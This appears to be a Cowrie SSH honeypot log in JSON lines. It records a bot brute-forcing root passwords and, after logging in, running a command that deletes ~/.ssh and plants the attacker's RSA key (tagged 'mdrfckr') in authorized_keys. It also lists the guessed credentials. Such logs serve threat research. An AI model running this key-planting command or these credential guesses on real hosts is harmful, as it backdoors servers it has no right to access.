{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:45.485573Z","src_ip":"212.227.235.229","session":"0cd7d3771547"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:45.622163Z","src_ip":"212.227.235.229","session":"6d1d2f401d95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:46.732441Z","src_ip":"212.227.235.229","session":"0cd7d3771547"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"gitrun@123","message":"login attempt [gitrun/gitrun@123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:06:47.499882Z","src_ip":"212.227.235.229","session":"0cd7d3771547"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:48.756607Z","src_ip":"212.227.235.229","session":"0cd7d3771547"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39598,"dst_ip":"1.2.3.4","dst_port":22,"session":"60cc5de9a666","protocol":"ssh","message":"New connection: 212.227.235.229:39598 (1.2.3.4:22) [session: 60cc5de9a666]","sensor":"my-vps","timestamp":"2025-09-08T23:06:50.085922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:50.087444Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:50.322495Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.session.closed","duration":120.0014111995697,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:50.709066Z","src_ip":"167.94.138.184","session":"cc2f109a3d43"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX#EDC","message":"login attempt [root/1qaz@WSX#EDC] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:06:51.302070Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:06:51.819201Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:06:51.820024Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:06:51.820884Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:52.056837Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:06:52.581853Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:06:52.582613Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:06:52.820160Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:52.820988Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39614,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4b68ece9fd2","protocol":"ssh","message":"New connection: 212.227.235.229:39614 (1.2.3.4:22) [session: e4b68ece9fd2]","sensor":"my-vps","timestamp":"2025-09-08T23:06:53.048670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:53.049624Z","src_ip":"212.227.235.229","session":"e4b68ece9fd2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:53.281794Z","src_ip":"212.227.235.229","session":"e4b68ece9fd2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:06:54.250265Z","src_ip":"212.227.235.229","session":"e4b68ece9fd2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:55.484548Z","src_ip":"212.227.235.229","session":"e4b68ece9fd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39620,"dst_ip":"1.2.3.4","dst_port":22,"session":"83716f5374a2","protocol":"ssh","message":"New connection: 212.227.235.229:39620 (1.2.3.4:22) [session: 83716f5374a2]","sensor":"my-vps","timestamp":"2025-09-08T23:06:55.720795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:55.721704Z","src_ip":"212.227.235.229","session":"83716f5374a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:55.956057Z","src_ip":"212.227.235.229","session":"83716f5374a2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:06:56.936396Z","src_ip":"212.227.235.229","session":"83716f5374a2"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:57.172085Z","src_ip":"212.227.235.229","session":"60cc5de9a666"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:57.172755Z","src_ip":"212.227.235.229","session":"83716f5374a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39144,"dst_ip":"1.2.3.4","dst_port":22,"session":"73018ef02eb0","protocol":"ssh","message":"New connection: 212.227.235.229:39144 (1.2.3.4:22) [session: 73018ef02eb0]","sensor":"my-vps","timestamp":"2025-09-08T23:07:09.329751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:09.330635Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:09.642756Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.login.success","username":"root","password":"april","message":"login attempt [root/april] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:07:10.930723Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:07:11.575704Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:07:11.576532Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:07:11.577859Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:11.891755Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:07:12.623993Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:07:12.624778Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:07:12.939373Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:12.940446Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40396,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8f58fe3eaae","protocol":"ssh","message":"New connection: 212.227.235.229:40396 (1.2.3.4:22) [session: a8f58fe3eaae]","sensor":"my-vps","timestamp":"2025-09-08T23:07:13.249617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:13.250248Z","src_ip":"212.227.235.229","session":"a8f58fe3eaae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:13.561291Z","src_ip":"212.227.235.229","session":"a8f58fe3eaae"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:07:14.846167Z","src_ip":"212.227.235.229","session":"a8f58fe3eaae"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:16.159515Z","src_ip":"212.227.235.229","session":"a8f58fe3eaae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41598,"dst_ip":"1.2.3.4","dst_port":22,"session":"50ec9152fe38","protocol":"ssh","message":"New connection: 212.227.235.229:41598 (1.2.3.4:22) [session: 50ec9152fe38]","sensor":"my-vps","timestamp":"2025-09-08T23:07:16.468054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:16.468936Z","src_ip":"212.227.235.229","session":"50ec9152fe38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:16.778748Z","src_ip":"212.227.235.229","session":"50ec9152fe38"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:07:18.057973Z","src_ip":"212.227.235.229","session":"50ec9152fe38"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:18.370361Z","src_ip":"212.227.235.229","session":"73018ef02eb0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:18.371552Z","src_ip":"212.227.235.229","session":"50ec9152fe38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41822,"dst_ip":"1.2.3.4","dst_port":22,"session":"17b4ead51da7","protocol":"ssh","message":"New connection: 212.227.235.229:41822 (1.2.3.4:22) [session: 17b4ead51da7]","sensor":"my-vps","timestamp":"2025-09-08T23:07:19.308112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:19.309035Z","src_ip":"212.227.235.229","session":"17b4ead51da7"}
